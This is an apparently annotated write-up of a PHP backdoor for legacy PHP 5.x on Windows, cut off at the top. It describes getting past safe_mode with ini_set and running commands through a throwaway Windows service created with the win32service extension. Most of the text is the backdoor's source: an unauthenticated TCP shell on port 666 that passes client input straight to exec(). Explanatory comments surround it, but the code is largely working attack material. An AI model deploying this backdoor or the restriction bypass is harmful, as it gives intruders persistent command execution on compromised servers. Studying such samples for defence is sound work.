|
When safe_mode = on, set_time_limit() is disabled ("off"), so the script can instead use
ini_set("max_execution_time", 90000000);
(Caveat before relying on this: safe_mode was removed in PHP 5.4, so the whole technique only concerns legacy PHP 5.3 and earlier, and the manual's own description of the max_execution_time directive states that it cannot be changed with ini_set() while safe mode is on — test it on the exact PHP build in question rather than assuming it works.)
=0D
Suppose the server is vulnerable to PHP code injection. An attacker can then plant a PHP backdoor and register it as a Windows service in the Service Control Manager (SCM) using the win32service extension.
=0D
The backdoor has to wait for incoming connections, so it needs an unlimited execution time; with safe_mode = on it can use ini_set("max_execution_time", &lt;value&gt;) in place of set_time_limit(0), because safe_mode blocks the latter.
=0D
Example of a backdoor that uses this technique (the listing below is truncated at the top: the beginning of the execCommand() method — presumably the win32_create_service() call whose argument array is visible on the first two code lines — is missing):
=0D
$n,'display'=>$n,=0D
'path'=>$cmd_local,'params'=>"/c $cmd >\"$name\""));=0D
=0D
win32_start_service($n);=0D
win32_stop_service($n);=0D
win32_delete_service($n);=0D
$content=file_get_contents($name);=0D
unlink($name);=0D
=0D
return $content;=0D
}=0D
=0D
function execConfig() {
    // Decide how this process will run shell commands and record the choice in
    // $this->exec as a string tag that listen() dispatches on:
    //   "exec"        - call exec() directly
    //   "execCommand" - run commands through a throwaway Windows service
    //                   (the win32service-based method, whose start is cut off
    //                   above this excerpt)
    //   "impossivel"  - no usable method (Portuguese: "impossible")
    $safe_mode = ini_get("safe_mode");
    $disable_functions = ini_get("disable_functions");
    // Use exec() directly when safe_mode is off and "exec" is not listed in
    // disable_functions.
    // NOTE(review): `== 0` is a loose comparison against the string returned by
    // ini_get(), and eregi() was removed in PHP 7, so this method only behaves
    // as written on the legacy PHP 5.x it targets (it is a fatal error on PHP >= 7).
    if ($safe_mode == 0 && (eregi("exec", $disable_functions) === false) ) {
        $this->exec = "exec";
    }
    // Otherwise try to get around safe_mode and/or disable_functions via the
    // win32service extension, if it is loaded.
    else {
        if (extension_loaded('win32service')) {
            $this->exec = "execCommand";
        }
        else {
            $this->exec = "impossivel";
        }
    }
}
=0D
=0D
function errCatch() {
    // Abort the whole process on a socket failure: print the last socket error
    // text followed by its numeric code and exit(). Used as the `or` fallback
    // on the socket calls in listen(); because it exits, no open socket is
    // closed explicitly and listen() never returns to the caller.
    exit(socket_strerror(socket_last_error()) . socket_last_error());
}
=0D
function listen() {
    // Serve a plain-text command shell on TCP 127.0.0.1:666, one client at a
    // time, until a client sends "shutdown".
    //
    // Notes for anyone analysing this sample:
    //  - there is no authentication of any kind: anything that can reach the
    //    loopback port gets command execution as the PHP process account;
    //  - every line other than "quit"/"shutdown" is passed verbatim (no
    //    escaping) to exec(), or to execCommand() when the win32service
    //    workaround is in use;
    //  - errCatch() calls exit(), so a failed socket_read() - and, per the PHP
    //    manual, a peer that closes the connection, which yields "" - kills the
    //    whole backdoor process rather than just the session;
    //  - NEW_LINE is a constant defined outside this excerpt.
    $socket;          // these three statements are no-ops; the variables are assigned below
    $socket_stream;
    $input_socket;
    $socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP) or $this->errCatch();
    // Loopback only: not reachable from the network without a local foothold.
    socket_bind($socket,'127.0.0.1', 666) or $this->errCatch();
    socket_listen($socket, 5) or $this->errCatch();


    do {
        $socket_stream = socket_accept($socket);
        if ($socket_stream === false) {
            continue 1;   // accept failed: retry at once (no backoff, busy loop)
        }
        // Only reached once a client has connected: send the welcome banner.
        // (Portuguese: "Welcome to the PHPShell backdoor. To leave, write 'quit'.
        // To stop the backdoor, type 'shutdown'.")
        $msg = NEW_LINE . "Bem vindo ao backdoor PHPShell" . NEW_LINE . "Para sair, escreva 'quit'. Para desligar o backdoor, digite 'shutdown'". NEW_LINE;
        socket_write($socket_stream, $msg, strlen($msg));


        // Session loop: one line per command from the connected client.
        do {
            // PHP_NORMAL_READ returns at a newline, at most 1000 bytes per line.
            // Any falsy return (false on error, "" on peer close, and also the
            // literal line "0") falls through to errCatch() and exits.
            $input_socket = socket_read($socket_stream,1000,PHP_NORMAL_READ) or
            $this->errCatch();


            $input_socket = trim($input_socket);
            if (empty($input_socket)) {
                continue 1; # blank line: back to the top of the session loop
            }

            switch ($input_socket) {
                case "quit":
                    socket_close($socket_stream);
                    break 2; # leave the session loop; wait for the next client
                case "shutdown":
                    socket_close($socket_stream);
                    socket_close($socket);
                    break 3; # leave both loops; listen() returns
            }

            // Anything that is neither quit nor shutdown is a command to run,
            // using the strategy chosen by execConfig().

            if ($this->exec == "execCommand") {
                // safe_mode / disable_functions workaround via a Windows service
                $this->result = $this->execCommand($input_socket);
            }

            if ($this->exec == "exec") {
                $output = "";
                $result_complete = "";
                $value = "";

                // The client's line is the shell command, unescaped.
                exec($input_socket, $output);
                foreach ($output as $value) {
                    $result_complete .= "$value" . NEW_LINE;
                }

                $this->result = $result_complete;
            }

            if ($this->exec == "impossivel") {
                // Portuguese: "Could not run commands: safe_mode=on and the
                // win32service extension is disabled; if you know another way
                // around safe_mode, edit the backdoor."
                $this->result = NEW_LINE . "Nao foi possivel executar comandos, safe_mode=on e extensao win32service desabilitada, caso conheca outro modo de burlar safe_mode, edite o backdoor" . NEW_LINE;
            }

            // Skip the write when the result is empty so that socket_write()
            // does not fail and tear down the session. (A result of exactly
            // "0" is falsy in PHP and is skipped as well.)
            if ($this->result) {
                socket_write($socket_stream,$this->result, strlen($this->result)) or
                $this->errCatch();
            }

        } while(true);
        #sessao  (end of the session loop)

    } while(true);
    #termina  (end of the accept loop)

}
=0D
function Backdoor() {
    // PHP 4-style constructor (method named after the class). Deprecated since
    // PHP 7.0 and no longer treated as a constructor in PHP 8, where
    // `new Backdoor()` would not run this body at all.
    $this->exec = "";    // execution-strategy tag, filled in by execConfig()
    $this->result = "";  // output of the last command, written back to the client
    $this->execConfig();
    socket_clear_error();
    $this->listen();     // blocks here serving clients until one sends "shutdown"
}
=0D
}=0D
=0D
// Instantiating the class is what starts the backdoor: the constructor selects
// an execution method and then calls listen(), which binds 127.0.0.1:666 and
// does not return until a client sends "shutdown". That is why the script
// needs an unlimited execution time - the ini_set("max_execution_time") point
// made at the top of this note.
$backdoor = new Backdoor();
?>